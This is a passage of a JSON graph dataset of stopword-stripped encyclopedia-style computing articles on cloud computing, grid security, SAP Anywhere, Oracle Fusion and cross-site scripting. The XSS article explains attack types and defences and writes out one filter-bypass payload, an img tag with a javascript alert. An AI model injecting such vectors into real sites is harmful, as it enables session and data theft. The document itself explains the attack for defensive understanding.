bandwidth effectively began use cloud symbol denote demarcation point provider responsible users responsible cloud computing extended boundary cover servers well network infrastructure computers became diffused scientists technologists explored ways make large-scale computing power available users time-sharing experimented algorithms optimize infrastructure platform applications prioritize cpus increase efficiency end users use cloud metaphor virtualized services dates least general magic 1994 used describe universe places mobile agents telescript environment could go described andy hertzfeld use cloud metaphor credited general magic communications employee david hoffman based long-standing use networking telecom addition use general magic also used promoting associated personalink services cloud computing existence since 2000 august 2006 amazon created subsidiary amazon web services introduced elastic compute cloud ec2 april 2008 google released google app engine beta early 2008 nasa opennebula enhanced reservoir european commission-funded project became first open-source software deploying private hybrid clouds federation clouds mid-2008 gartner saw opportunity cloud computing shape relationship among consumers services use services sell observed organizations switching company-owned hardware software assets per-use service-based models projected shift computing ... result dramatic growth products areas significant reductions areas 2008 u.s. national science foundation began cluster exploratory program fund academic research using google-ibm cluster technology analyze massive amounts data february 2010 microsoft released microsoft azure announced october 2008 july 2010 rackspace hosting nasa jointly launched open-source cloud-software initiative known openstack openstack project intended help organizations offering cloud-computing services running standard hardware early code came nasa nebula platform well rackspace cloud files platform open source offering along open-source solutions cloudstack ganeti opennebula attracted attention several key communities several studies aim comparing open sources offerings based set criteria march 1 2011 ibm announced ibm smartcloud framework support smarter planet among various components smarter computing foundation cloud computing critical part june 7 2012 oracle announced oracle cloud cloud offering poised first provide users access integrated set solutions including applications saas platform paas infrastructure iaas layers may 2012 google compute engine released preview rolled general availability december 2013 2019 revealed linux used microsoft azure dominant elsewhere goal cloud computing allow users take benefit technologies without need deep knowledge expertise one cloud aims cut costs helps users focus core business instead impeded obstacles main enabling technology cloud computing virtualization virtualization software separates physical computing device one virtual devices easily used managed perform computing tasks operating system–level virtualization essentially creating scalable system multiple independent computing devices idle computing resources allocated used efficiently virtualization provides agility required speed operations reduces cost increasing infrastructure utilization autonomic computing automates process user provision resources on-demand minimizing user involvement automation speeds process reduces labor costs reduces possibility human errors cloud computing uses concepts utility computing provide metrics services used cloud computing attempts address qos quality service reliability problems grid computing models cloud computing shares characteristics cloud computing exhibits following key characteristics national institute standards technology definition cloud computing identifies five essential characteristics though service-oriented architecture advocates everything service acronyms eaas xaas simply aas cloud-computing providers offer services according different models three standard models per nist infrastructure service iaas platform service paas software service saas models offer increasing abstraction thus often portrayed layers stack infrastructure- platform- software-as-a-service need related example one provide saas implemented physical machines bare metal without using underlying paas iaas layers conversely one run program iaas access directly without wrapping saas infrastructure service iaas refers online services provide high-level apis used dereference various low-level details underlying network infrastructure like physical computing resources location data partitioning scaling security backup etc hypervisor runs virtual machines guests pools hypervisors within cloud operational system support large numbers virtual machines ability scale services according customers varying requirements linux containers run isolated partitions single linux kernel running directly physical hardware linux cgroups namespaces underlying linux kernel technologies used isolate secure manage containers containerisation offers higher performance virtualization hypervisor overhead also container capacity auto-scales dynamically computing load eliminates problem over-provisioning enables usage-based billing iaas clouds often offer additional resources virtual-machine disk-image library raw block storage file object storage firewalls load balancers ip addresses virtual local area networks vlans software bundles nist definition cloud computing describes iaas consumer able deploy run arbitrary software include operating systems applications consumer manage control underlying cloud infrastructure control operating systems storage deployed applications possibly limited control select networking components e.g. host firewalls iaas-cloud providers supply resources on-demand large pools equipment installed data centers wide-area connectivity customers use either internet carrier clouds dedicated virtual private networks deploy applications cloud users install operating-system images application software cloud infrastructure model cloud user patches maintains operating systems application software cloud providers typically bill iaas services utility computing basis cost reflects amount resources allocated consumed nist definition cloud computing defines platform service paas vendors offer development environment application developers provider typically develops toolkit standards development channels distribution payment paas models cloud providers deliver computing platform typically including operating system programming-language execution environment database web server application developers develop run software cloud platform instead directly buying managing underlying hardware software layers paas underlying computer storage resources scale automatically match application demand cloud user allocate resources manually integration data management providers also use specialized applications paas delivery models data examples include ipaas integration platform service dpaas data platform service ipaas enables customers develop execute govern integration flows ipaas integration model customers drive development deployment integrations without installing managing hardware middleware dpaas delivers integration—and data-management—products fully managed service dpaas model paas provider customer manages development execution programs building data applications customer dpaas users access data data-visualization tools platform service paas consumers manage control underlying cloud infrastructure including network servers operating systems storage control deployed applications possibly configuration settings application-hosting environment nist definition cloud computing defines software service software service saas model users gain access application software databases cloud providers manage infrastructure platforms run applications saas sometimes referred on-demand software usually priced pay-per-use basis using subscription fee saas model cloud providers install operate application software cloud cloud users access software cloud clients cloud users manage cloud infrastructure platform application runs eliminates need install run application cloud user computers simplifies maintenance support cloud applications differ applications scalability—which achieved cloning tasks onto multiple virtual machines run-time meet changing work demand load balancers distribute work set virtual machines process transparent cloud user sees single access-point accommodate large number cloud users cloud applications multitenant meaning machine may serve one cloud-user organization pricing model saas applications typically monthly yearly flat fee per user prices become scalable adjustable users added removed point proponents claim saas gives business potential reduce operational costs outsourcing hardware software maintenance support cloud provider enables business reallocate operations costs away hardware/software spending personnel expenses towards meeting goals addition applications hosted centrally updates released without need users install new software one drawback saas comes storing users data cloud provider server result could unauthorized access data mobile backend service model also known backend service baas web app mobile app developers provided way link applications cloud storage cloud computing services application programming interfaces apis exposed applications custom software development kits sdks services include user management push notifications integration social networking services relatively recent model cloud computing baas startups dating 2011 later trends indicate services gaining significant mainstream traction enterprise consumers serverless computing cloud computing code execution model cloud provider fully manages starting stopping virtual machines necessary serve requests requests billed abstract measure resources required satisfy request rather per virtual machine per hour despite name actually involve running code without servers serverless computing named business person owns system purchase rent provision servers virtual machines back-end code run function service faas service-hosted remote procedure call leverages serverless computing enable deployment individual functions cloud run response events faas included broader term serverless computing terms may also used interchangeably private cloud cloud infrastructure operated solely single organization whether managed internally third party hosted either internally externally undertaking private cloud project requires significant engagement virtualize business environment requires organization reevaluate decisions existing resources improve business every step project raises security issues must addressed prevent serious vulnerabilities self-run data centers generally capital intensive significant physical footprint requiring allocations space hardware environmental controls assets refreshed periodically resulting additional capital expenditures attracted criticism users still buy build manage thus benefit less hands-on management essentially lacking economic model makes cloud computing intriguing concept cloud called public cloud services rendered network open public use public cloud services may free technically may little difference public private cloud architecture however security consideration may substantially different services applications storage resources made available service provider public audience communication effected non-trusted network generally public cloud service providers like amazon web services aws ibm oracle microsoft google operate infrastructure data center access generally via internet aws oracle microsoft google also offer direct connect services called aws direct connect oracle fastconnect azure expressroute cloud interconnect respectively connections require customers purchase lease private connection peering point offered cloud provider hybrid cloud composition public cloud private environment private cloud on-premise resources remain distinct entities bound together offering benefits multiple deployment models hybrid cloud also mean ability connect collocation managed and/or dedicated services cloud resources gartner defines hybrid cloud service cloud computing service composed combination private public community cloud services different service providers hybrid cloud service crosses isolation provider boundaries ca n't simply put one category private public community cloud service allows one extend either capacity capability cloud service aggregation integration customization another cloud service varied use cases hybrid cloud composition exist example organization may store sensitive client data house private cloud application interconnect application business intelligence application provided public cloud software service example hybrid cloud extends capabilities enterprise deliver specific business service addition externally available public cloud services hybrid cloud adoption depends number factors data security compliance requirements level control needed data applications organization uses another example hybrid cloud one organizations use public cloud computing resources meet temporary capacity needs met private cloud capability enables hybrid clouds employ cloud bursting scaling across clouds cloud bursting application deployment model application runs private cloud data center bursts public cloud demand computing capacity increases primary advantage cloud bursting hybrid cloud model organization pays extra compute resources needed cloud bursting enables data centers create in-house infrastructure supports average workloads use cloud resources public private clouds spikes processing demands specialized model hybrid cloud built atop heterogeneous hardware called cross-platform hybrid cloud cross-platform hybrid cloud usually powered different cpu architectures example x86-64 arm underneath users transparently deploy scale applications without knowledge cloud hardware diversity kind cloud emerges rise arm-based system-on-chip server-class computing community cloud shares infrastructure several organizations specific community common concerns security compliance jurisdiction etc whether managed internally third-party either hosted internally externally costs spread fewer users public cloud private cloud cost savings potential cloud computing realized cloud computing platform assembled distributed set machines different locations connected single network hub service possible distinguish two types distributed clouds public-resource computing volunteer cloud multicloud use multiple cloud computing services single heterogeneous architecture reduce reliance single vendors increase flexibility choice mitigate disasters etc differs hybrid cloud refers multiple cloud services rather multiple deployment modes public private legacy issues transferring large amounts data cloud well data security data cloud initially hampered adoption cloud big data much data originates cloud advent bare-metal servers cloud become solution use cases including business analytics geospatial analysis hpc cloud refers use cloud computing services infrastructure execute high-performance computing hpc applications applications consume considerable amount computing power memory traditionally executed clusters computers 2016 handful companies including r-hpc amazon web services univa silicon graphics international sabalcore gomput penguin computing offered high performance computing cloud penguin demand pod cloud one first non-virtualized remote hpc services offered pay-as-you-go basis penguin computing launched hpc cloud 2016 alternative amazon ec2 elastic compute cloud uses virtualized computing nodes cloud architecture systems architecture software systems involved delivery cloud computing typically involves multiple cloud components communicating loose coupling mechanism messaging queue elastic provision implies intelligence use tight loose coupling applied mechanisms others cloud engineering application engineering disciplines cloud computing brings systematic approach high-level concerns commercialization standardization governance conceiving developing operating maintaining cloud computing systems multidisciplinary method encompassing contributions diverse areas systems software web performance information technology engineering security platform risk quality engineering cloud computing poses privacy concerns service provider access data cloud time could accidentally deliberately alter delete information many cloud providers share information third parties necessary purposes law order without warrant permitted privacy policies users must agree start using cloud services solutions privacy include policy legislation well end users choices data stored users encrypt data processed stored within cloud prevent unauthorized access identity management systems also provide practical solutions privacy concerns cloud computing systems distinguish authorized unauthorized users determine amount data accessible entity systems work creating describing identities recording activities getting rid unused identities according cloud security alliance top three threats cloud insecure interfaces api data loss leakage hardware failure —which accounted 29 25 10 cloud security outages respectively together form shared technology vulnerabilities cloud provider platform shared different users may possibility information belonging different customers resides data server additionally eugene schultz chief technology officer emagined security said hackers spending substantial time effort looking ways penetrate cloud real achilles heels cloud infrastructure making big holes bad guys get data hundreds thousands companies stored large cloud servers hackers theoretically gain control huge stores information single attack—a process called hyperjacking examples include dropbox security breach icloud 2014 leak dropbox breached october 2014 7 million users passwords stolen hackers effort get monetary value bitcoins btc passwords able read private data well data indexed search engines making information public problem legal ownership data user stores data cloud cloud provider profit many terms service agreements silent question ownership physical control computer equipment private cloud secure equipment site someone else control public cloud delivers great incentive public cloud computing service providers prioritize building maintaining strong management secure services small businesses n't expertise security could find secure use public cloud risk end users understand issues involved signing cloud service persons sometimes n't read many pages terms service agreement click accept without reading important cloud computing becoming popular required services work example intelligent personal assistant apple siri google fundamentally private cloud seen secure higher levels control owner however public cloud seen flexible requires less time money investment user according bruce schneier downside limited customization options cloud computing cheaper economics scale and—like outsourced task—you tend get get restaurant limited menu cheaper personal chef cook anything want fewer options much cheaper price feature bug also suggests cloud provider might meet legal needs businesses need weigh benefits cloud computing risks cloud computing control back end infrastructure limited cloud vendor cloud providers often decide management policies moderates cloud users able deployment cloud users also limited control management applications data services includes data caps placed cloud users cloud vendor allocating certain amount bandwidth customer often shared among cloud users privacy confidentiality big concerns activities instance sworn translators working stipulations nda might face problems regarding sensitive data encrypted cloud computing beneficial many enterprises lowers costs allows focus competence instead matters infrastructure nevertheless cloud computing proven limitations disadvantages especially smaller business operations particularly regarding security downtime technical outages inevitable occur sometimes cloud service providers csps become overwhelmed process serving clients may result temporary business suspension since technology systems rely internet individual able access applications server data cloud outage cloud computing still subject research driving factor evolution cloud computing chief technology officers seeking minimize risk internal outages mitigate complexity housing network computing hardware in-house major cloud technology companies invest billions dollars per year cloud research development example 2011 microsoft committed 90 percent 9.6 billion r budget cloud research investment bank centaur partners late 2015 forecasted saas revenue would grow 13.5 billion 2011 32.8 billion 2016 issue carrying investigations cloud storage devices physically accessed generated number changes way digital evidence located collected new process models developed formalize collection scenarios existing digital forensics tools employed access cloud storage networked drives although slow process generating large amount internet traffic alternative approach deploy tool processes cloud organizations using office 365 'e5 subscription option use microsoft built-in ediscovery resources although provide functionality typically required forensic process",
    "neighbors": [
      10242,
      10247,
      6153,
      4107,
      10265,
      10270,
      39,
      6184,
      6185,
      42,
      2090,
      4142,
      8255,
      10303,
      2113,
      8269,
      4176,
      2140,
      94,
      4190,
      4193,
      10338,
      8291,
      10341,
      6246,
      8295,
      4205,
      110,
      6255,
      2160,
      2170,
      8316,
      127,
      4236,
      10382,
      154,
      8346,
      8353,
      2210,
      6307,
      6308,
      2213,
      2217,
      170,
      2218,
      2222,
      6327,
      10427,
      4286,
      4289,
      6341,
      6344,
      202,
      2259,
      4308,
      8406,
      2263,
      2264,
      10454,
      8412,
      6367,
      4327,
      2285,
      253,
      8446,
      8447,
      8451,
      4363,
      4367,
      272,
      8465,
      4372,
      277,
      6421,
      2328,
      4377,
      10522,
      8475,
      10523,
      10525,
      6435,
      4388,
      2345,
      6444,
      8495,
      10546,
      8501,
      8514,
      8515,
      4423,
      8520,
      330,
      8523,
      333,
      4429,
      337,
      2385,
      6483,
      344,
      2394,
      354,
      10597,
      2409,
      6507,
      368,
      4464,
      6514,
      4471,
      10615,
      2426,
      8571,
      6530,
      394,
      8591,
      8592,
      10641,
      405,
      6565,
      10675,
      437,
      8630,
      10681,
      448,
      2496,
      8640,
      6595,
      8644,
      2504,
      6600,
      10700,
      467,
      8660,
      6618,
      8666,
      6622,
      2536,
      6632,
      8681,
      2543,
      10735,
      499,
      10742,
      4604,
      508,
      2558,
      6665,
      4618,
      4621,
      526,
      4622,
      4623,
      530,
      539,
      10782,
      551,
      8744,
      554,
      558,
      8756,
      6711,
      10811,
      10820,
      4683,
      10827,
      590,
      8792,
      2651,
      2654,
      8810,
      10858,
      624,
      6774,
      8826,
      6785,
      2694,
      648,
      6797,
      10893,
      4754,
      662,
      2710,
      4761,
      6815,
      2720,
      10911,
      10912,
      2733,
      6833,
      10929,
      6846,
      4799,
      4802,
      6853,
      6856,
      6858,
      10957,
      728,
      8921,
      731,
      2779,
      2784,
      8934,
      2795,
      6891,
      754,
      6909,
      772,
      6917,
      4876,
      785,
      2834,
      2836,
      6932,
      6934,
      11030,
      11031,
      8986,
      11038,
      6943,
      2855,
      4909,
      820,
      2870,
      823,
      11070,
      832,
      11075,
      6981,
      9031,
      6987,
      4945,
      2901,
      2902,
      4950,
      6999,
      857,
      9048,
      11097,
      4958,
      4964,
      9069,
      2926,
      7022,
      9071,
      4977,
      11117,
      2944,
      4997,
      2950,
      9095,
      11144,
      9101,
      7054,
      911,
      9104,
      11156,
      2965,
      11159,
      9116,
      9126,
      11178,
      940,
      956,
      11201,
      7106,
      11203,
      970,
      5066,
      11221,
      982,
      9181,
      11233,
      3042,
      5090,
      11235,
      7142,
      1001,
      3057,
      9202,
      11268,
      7175,
      9225,
      9228,
      3086,
      1048,
      1049,
      7199,
      9248,
      5159,
      1065,
      7216,
      3121,
      7218,
      1079,
      5178,
      1086,
      9278,
      3143,
      1102,
      7248,
      5202,
      9301,
      3160,
      5210,
      9314,
      5223,
      1134,
      11375,
      7280,
      11377,
      11378,
      3197,
      11393,
      11400,
      1166,
      7313,
      11410,
      3219,
      11423,
      3232,
      3236,
      5284,
      1197,
      5295,
      9396,
      11445,
      7352,
      9401,
      7357,
      3262,
      3269,
      11463,
      1224,
      5327,
      1238,
      1239,
      7389,
      11487,
      7397,
      3302,
      9449,
      1259,
      1262,
      9455,
      11504,
      5363,
      11510,
      9466,
      3323,
      5371,
      11515,
      5375,
      5378,
      5384,
      11535,
      5394,
      7446,
      11542,
      1309,
      11549,
      1315,
      3365,
      3369,
      7469,
      11577,
      5443,
      3398,
      7497,
      3405,
      11597,
      1362,
      7512,
      9562,
      11618,
      3428,
      3432,
      3433,
      9584,
      7537,
      1400,
      5499,
      11646,
      5504,
      9602,
      1415,
      7563,
      11659,
      1421,
      5518,
      1423,
      3479,
      1435,
      7581,
      5535,
      11681,
      11687,
      11692,
      3502,
      9648,
      9650,
      1480,
      9675,
      7628,
      9682,
      1492,
      7642,
      1507,
      7660,
      3568,
      3573,
      1529,
      7677,
      1539,
      5650,
      7699,
      5658,
      5662,
      5666,
      9766,
      7721,
      3627,
      9772,
      3629,
      3633,
      5681,
      9778,
      7736,
      5689,
      1602,
      3655,
      1612,
      3660,
      9805,
      5718,
      1628,
      5732,
      1638,
      3686,
      3691,
      5749,
      5750,
      7802,
      1663,
      7812,
      5770,
      9867,
      1678,
      7822,
      1688,
      5784,
      5791,
      5798,
      1704,
      9901,
      9906,
      5832,
      1740,
      5838,
      7891,
      5848,
      1755,
      1759,
      5857,
      3819,
      3822,
      1776,
      9970,
      9974,
      7937,
      3849,
      3851,
      9995,
      7963,
      1831,
      10028,
      3886,
      7983,
      1840,
      7990,
      10038,
      5948,
      5951,
      5956,
      5959,
      5960,
      1866,
      3925,
      10077,
      3941,
      10088,
      10090,
      8044,
      8061,
      6018,
      6027,
      1935,
      3990,
      10134,
      3993,
      6042,
      1948,
      10140,
      6046,
      8098,
      10152,
      4024,
      6073,
      10168,
      8123,
      8128,
      8131,
      4040,
      6088,
      10194,
      4052,
      2008,
      10200,
      2011,
      10204,
      8164,
      8170,
      8174,
      10222,
      8176,
      10226,
      10227,
      4091,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 4195,
    "label": 7,
    "text": "Grid_Security_Infrastructure:grid security infrastructure grid security infrastructure gsi formerly called globus security infrastructure specification secret tamper-proof delegatable communication software grid computing environment secure authenticatable communication enabled using asymmetric encryption authentication performed using digital signature technology see digital signatures explanation works secure authentication allows resources lock data access authentication introduces problem often service retrieve data resource independent user order must supplied appropriate privileges gsi allows creation delegated privileges new key created marked delegated signed user possible service act behalf user fetch data resource communications may secured using combination methods",
    "neighbors": [
      8674,
      5956,
      1862,
      1607,
      11353,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 4196,
    "label": 9,
    "text": "Pattern_directed_invocation_programming_language:pattern directed invocation programming language computer science pattern-directed invocation programming languages programming languages procedures invoked indirectly specifying pattern set procedures opposed specifying one directly name pointer url etc. conventional programming languages initiated planner featured high level plans invoked patterns assertions goals include logic programming languages prolog special case ether pattern-directed invocation language introduced scientific community metaphor pattern-directed invocation commonly used practical alternative first-order theorem proving automated theorem proving primary method implementing blackboard system automated reasoning general database facts la prolog augmented set procedures called demons demon automatically invoked whenever term matching demon pattern added database pattern-directed invocation related rule-based programming",
    "neighbors": [
      8421
    ],
    "mask": "Test"
  },
  {
    "node_id": 4197,
    "label": 7,
    "text": "SAP_Anywhere:sap anywhere sap anywhere front office software package sap se sap small medium sized enterprises smbs 10 500 employees early 2018 sap decided sunset product focus smb market established sap business one sap business bydesign erp solutions sap anywhere includes several front office applications intended help retail wholesale businesses market sell products services multiple sales channels including in-store direct sales online system facilitates effective customer relationship management allowing business owners review direct marketing inventory direct customer experiences using single system mobile devices according research firm international data corporation idc many small businesses struggle date processes fail optimise online business tools e-commerce increasing factor maintaining relationships customers sap anywhere intended allow small businesses take advantage digital revolution increase customer reach e-commerce business-to-business b2b business-to-consumer b2c channels president global channels general business sap rodolpho cardenuto said 2016 “ 79 million small midsize companies worldwide lifeblood economy sap anywhere primarily used smbs 20 clients falling outside smb category sap anywhere launched sap china telecom 20 october 2015 mainland china sap german multinational software corporation headquartered walldorf baden-württemberg germany founded 1972 sap focuses creating enterprise software 2014 sap created new division focus smb small-medium business customers smb solutions group smb software preceding sap anywhere includes china telecom established 2000 largest fixed-line service provider people ’ republic china third largest mobile telecommunication provider china developing sap anywhere sap utilised telecommunications infrastructure china telecom developed product customised chinese market smbs represent two thirds businesses china initial plans release focused building strong customer base china expanding markets due competitive pressure sap released sap anywhere english-speaking market earlier planned uk availability announced march 2016 us availability announced may 2016 canadian pilot currently planned 2016 sap anywhere cloud based saas software service delivered sap public cloud amazon cloud us market sap anywhere accessed mobile devices desktops includes applications sap anywhere uses sap hana enables data captured mined real time allowing accurate inventory sales order management across multiple channels sap anywhere integrates constant contact mailchimp payment gateways like paypal stripe sap anywhere uses secure transactions secure sockets layer ssl protection well sap anywhere integrated delivery company ups sap anywhere allows businesses utilise google productivity collaboration tools interact customers google apps integration internal back office enterprise resource planning applications like hr finance also available",
    "neighbors": [
      1765,
      4363,
      5677,
      467,
      5210,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 4198,
    "label": 4,
    "text": "Cross-site_scripting:cross-site scripting cross-site scripting xss type computer security vulnerability typically found web applications xss enables attackers inject client-side scripts web pages viewed users cross-site scripting vulnerability may used attackers bypass access controls same-origin policy cross-site scripting carried websites accounted roughly 84 security vulnerabilities documented symantec 2007 2017 xss still considered major threat vector xss effects vary range petty nuisance significant security risk depending sensitivity data handled vulnerable site nature security mitigation implemented site owner network security web depends variety mechanisms including underlying concept trust known same-origin policy essentially states content one site nowiki https //mybank.example1.com /nowiki granted permission access resources like cookies etc web browser content url 1 uri scheme 2 host name 3 port number share permissions content urls three attributes different granted permissions separately cross-site scripting attacks use known vulnerabilities web-based applications servers plug-in systems rely exploiting one attackers fold malicious content content delivered compromised site resulting combined content arrives client-side web browser delivered trusted source thus operates permissions granted system finding ways injecting malicious scripts web pages attacker gain elevated access-privileges sensitive page content session cookies variety information maintained browser behalf user cross-site scripting attacks case code injection microsoft security-engineers introduced term cross-site scripting january 2000 expression cross-site scripting originally referred act loading attacked third-party web application unrelated attack-site manner executes fragment javascript prepared attacker security context targeted domain taking advantage reflected non-persistent xss vulnerability definition gradually expanded encompass modes code injection including persistent non-javascript vectors including activex java vbscript flash even html scripts causing confusion newcomers field information security xss vulnerabilities reported exploited since 1990s prominent sites affected past include social-networking sites twitter facebook myspace youtube orkut cross-site scripting flaws since surpassed buffer overflows become common publicly reported security vulnerability researchers 2007 estimating many 68 websites likely open xss attacks single standardized classification cross-site scripting flaws experts distinguish least two primary flavors xss flaws non-persistent persistent sources divide two groups traditional caused server-side code flaws dom-based client-side code non-persistent reflected cross-site scripting vulnerability far basic type web vulnerability holes show data provided web client commonly http query parameters e.g html form submission used immediately server-side scripts parse display page results user without properly sanitizing content html documents flat serial structure mixes control statements formatting actual content non-validated user-supplied data included resulting page without proper html encoding may lead markup injection classic example potential vector site search engine one searches string search string typically redisplayed verbatim result page indicate searched response properly escape reject html control characters cross-site scripting flaw ensue reflected attack typically delivered via email neutral web site bait innocent-looking url pointing trusted site containing xss vector trusted site vulnerable vector clicking link cause victim browser execute injected script persistent stored xss vulnerability devastating variant cross-site scripting flaw occurs data provided attacker saved server permanently displayed normal pages returned users course regular browsing without proper html escaping classic example online message boards users allowed post html formatted messages users read example suppose dating website members scan profiles members see look interesting privacy reasons site hides everybody real name email kept secret server time member real name email browser member signed ca n't see anyone else suppose mallory attacker joins site wants figure real names people sees site writes script designed run users browsers visit profile script sends quick message server collects information question describe ideal first date mallory gives short answer appear normal text end answer script steal names emails script enclosed inside script element wo n't shown screen suppose bob member dating site reaches mallory profile answer first date question script run automatically browser steals copy bob real name email directly machine persistent xss vulnerabilities significant types attacker malicious script rendered automatically without need individually target victims lure third-party website particularly case social networking sites code would designed self-propagate across accounts creating type client-side worm methods injection vary great deal cases attacker may even need directly interact web functionality exploit hole data received web application via email system logs im etc controlled attacker could become injection vector historically xss vulnerabilities first found applications performed data processing server side user input including xss vector would sent server sent back user web page need improved user experience resulted popularity applications majority presentation logic maybe written javascript working client-side pulled data on-demand server using ajax javascript code also processing user input rendering web page content new sub-class reflected xss attacks started appear called dom-based cross-site scripting dom-based xss attack malicious data touch web server rather reflected javascript code fully client side example dom-based xss vulnerability bug found 2011 number jquery plugins prevention strategies dom-based xss attacks include similar measures traditional xss prevention strategies implemented javascript code contained web pages i.e input validation escaping javascript frameworks built-in countermeasures types attack — example angular.js self-xss form xss vulnerability relies social engineering order trick victim executing malicious javascript code browser although technically true xss vulnerability due fact relies socially engineering user executing code rather flaw affected website allowing attacker still poses risks regular xss vulnerability properly executed mutated xss happens attacker injects something seemingly safe rewritten modified browser parsing markup makes extremely hard detect sanitize within websites application logic example rebalancing unclosed quotation marks even adding quotation marks unquoted parameters parameters css font-family attackers intending exploit cross-site scripting vulnerabilities must approach class vulnerability differently class specific attack vector described names technical terms taken alice-and-bob cast characters commonly used computer security browser exploitation framework could used attack web site user local environment several things could done mitigate attack bob website software stripped script tag done something make sure n't work security bug fact n't contextual output encoding/escaping could used primary defense mechanism stop xss attacks several escaping schemes used depending untrusted string needs placed within html document including html entity encoding javascript escaping css escaping url percent encoding web applications need accept rich data use escaping largely eliminate risk xss attacks fairly straightforward manner although widely recommended performing html entity encoding five xml significant characters always sufficient prevent many forms xss attacks encoding often difficult security encoding libraries usually easier use web template systems understand structure html produces automatically pick appropriate encoder many operators particular web applications e.g forums webmail allow users utilize limited subset html markup accepting html input users say b /b large output encoding lt b gt lt /b gt large suffice since user input needs rendered html browser shows large instead b /b large stopping xss attack accepting html input users much complex situation untrusted html input must run html sanitization engine ensure contain xss code also noted many validations rely parsing blacklisting specific risk html tags following script link iframe several issues approach example sometimes seemingly harmless tags left utilized correctly still result xss see example img src= javascript alert 1 another popular method strip user input however also bypassed payload concealed obfuscation see link extreme example besides content filtering imperfect methods cross-site scripting mitigation also commonly used one example use additional security controls handling cookie-based user authentication many web applications rely session cookies authentication individual http requests client-side scripts generally access cookies simple xss exploits steal cookies mitigate particular threat though xss problem general many web applications tie session cookies ip address user originally logged permit ip use cookie effective situations attacker cookie obviously breaks situations attacker behind nated ip address web proxy victim victim changing mobile ip another mitigation present internet explorer since version 6 firefox since version 2.0.0.5 safari since version 4 opera since version 9.5 google chrome httponly flag allows web server set cookie unavailable client-side scripts beneficial feature neither fully prevent cookie theft prevent attacks within browser web 2.0 ajax developers require use javascript web applications written allow operation without need client-side scripts allows users choose disable scripting browsers using application way even potentially malicious client-side scripts could inserted unescaped page users would susceptible xss attacks browsers browser plugins configured disable client-side scripts per-domain basis approach limited value scripting allowed default since blocks bad sites user knows bad late functionality blocks scripting external inclusions default allows user enable per-domain basis effective possible long time internet explorer since version 4 setting called security zones opera since version 9 using site specific preferences solution firefox gecko-based browsers open source noscript add-on addition ability enable scripts per-domain basis provides xss protection even scripts enabled significant problem blocking scripts websites default substantial reduction functionality responsiveness client-side scripting much faster server-side scripting need connect remote server page frame need reloaded another problem script blocking many users understand know properly secure browsers yet another drawback many sites work without client-side scripting forcing users disable protection site opening systems vulnerabilities firefox noscript extension enables users allow scripts selectively given page disallowing others page example scripts example.com could allowed scripts advertisingagency.com attempting run page could disallowed content-security-policy csp allows html documents opt-into disabling scripts leaving others enabled browser checks script policy deciding whether run long policy allows trustworthy scripts disallows dynamic code loading browser run programs untrusted authors regardless html document structure shifts security burden policy authors studies cast doubt efficacy host whitelist based policies.in total find 94.68 policies attempt limit script execution ineffective 99.34 hosts csp use policies offer benefit xss.modern csp policies allow using nonces mark scripts html document safe run instead keeping policy entirely separate page content long trusted nonces appear trustworthy scripts browser run programs untrusted authors large application providers report successfully deployed nonce-based policies popularity client-side frameworks changed attackers craft xss.script gadgets legitimate javascript fragments within application ’ legitimate code base … demonstrate gadgets omnipresent almost modern javascript frameworks present empirical study showing prevalence script gadgets productive code result assume mitigation techniques web applications written today bypassed.trusted types changes web apis check values trademarked trusted long programs trademark trustworthy values attacker controls javascript string value cause xss trusted types designed auditable blue teams another defense approach use automated tools remove xss malicious code web pages tools use static analysis and/or pattern matching methods identify malicious codes potentially secure using methods like escaping cookie set samesite=strict parameter stripped cross-origin requests set samesite=lax stripped non- safe cross-origin requests requests get options trace read-only semantics feature implemented google chrome since version 63 firefox since version 60 universal cross-site scripting uxss universal xss attack vulnerabilities browser browser plugins exploited rather vulnerabilities websites case xss attacks attacks commonly used anonymous along ddos compromise control network several classes vulnerabilities attack techniques related xss cross-zone scripting exploits zone concepts certain browsers usually executes code greater privilege http header injection used create cross-site scripting conditions due escaping problems http protocol level addition enabling attacks http response splitting cross-site request forgery csrf/xsrf almost opposite xss rather exploiting user trust site attacker malicious page exploits site trust client software submitting requests site believes represent conscious intentional actions authenticated users xss vulnerabilities even applications running domain allow attackers bypass csrf prevention efforts covert redirection takes advantage third-party clients susceptible xss open redirect attacks normal phishing attempts easy spot malicious page url usually couple letters real site difference covert redirection attacker could use real website instead corrupting site malicious login pop-up dialogue box lastly sql injection exploits vulnerability database layer application user input incorrectly filtered sql statements executed application specific xsss affect given version web browser tend unique consequently possible use xss fingerprint browser vendor version user",
    "neighbors": [
      5636,
      8200,
      11,
      1547,
      7708,
      5677,
      2611,
      3643,
      7739,
      9293,
      1108,
      87,
      1111,
      3700,
      4725,
      119,
      7304,
      8846,
      7324,
      161,
      10412,
      2737,
      7871,
      5827,
      3785,
      7373,
      10492,
      5373,
      774,
      1802,
      1803,
      8978,
      1812,
      6423,
      5404,
      7965,
      8990,
      10015,
      10026,
      5934,
      4403,
      5435,
      2878,
      3391,
      331,
      4956,
      6497,
      9569,
      3941,
      7526,
      2409,
      5483,
      8045,
      8054,
      10624,
      899,
      7044,
      3462,
      8584,
      9096,
      3986,
      1429,
      11683,
      9125,
      2470,
      5543,
      939,
      1470,
      450,
      1474,
      1494,
      5078,
      3047,
      7659,
      6636,
      8176,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4199,
    "label": 7,
    "text": "Oracle_Fusion_Applications:oracle fusion applications oracle fusion applications ofa enterprise resource planning software applications oracle corporation applications distributed across various product families including financial management human capital management customer relationship management supply chain management procurement governance project portfolio oracle fusion applications announced shortly oracle 18 billion usd acquisition spree peoplesoft jd edwards siebel systems 2005 oracle fusion applications envisioned pitched enterprise resource planning suite—a combination features functionalities taken oracle e-business suite jd edwards peoplesoft siebel product lines suite built top oracle fusion middleware technology stack layers implement oracle fusion architecture leverages capabilities service-oriented architecture oracle fusion applications launched september 2010 released one year later openworld 2011",
    "neighbors": [
      6419,
      10553,
      4107,
      1612
    ],
    "mask": "Test"
  },
  {
    "node_id": 4200,
    "label": 7,
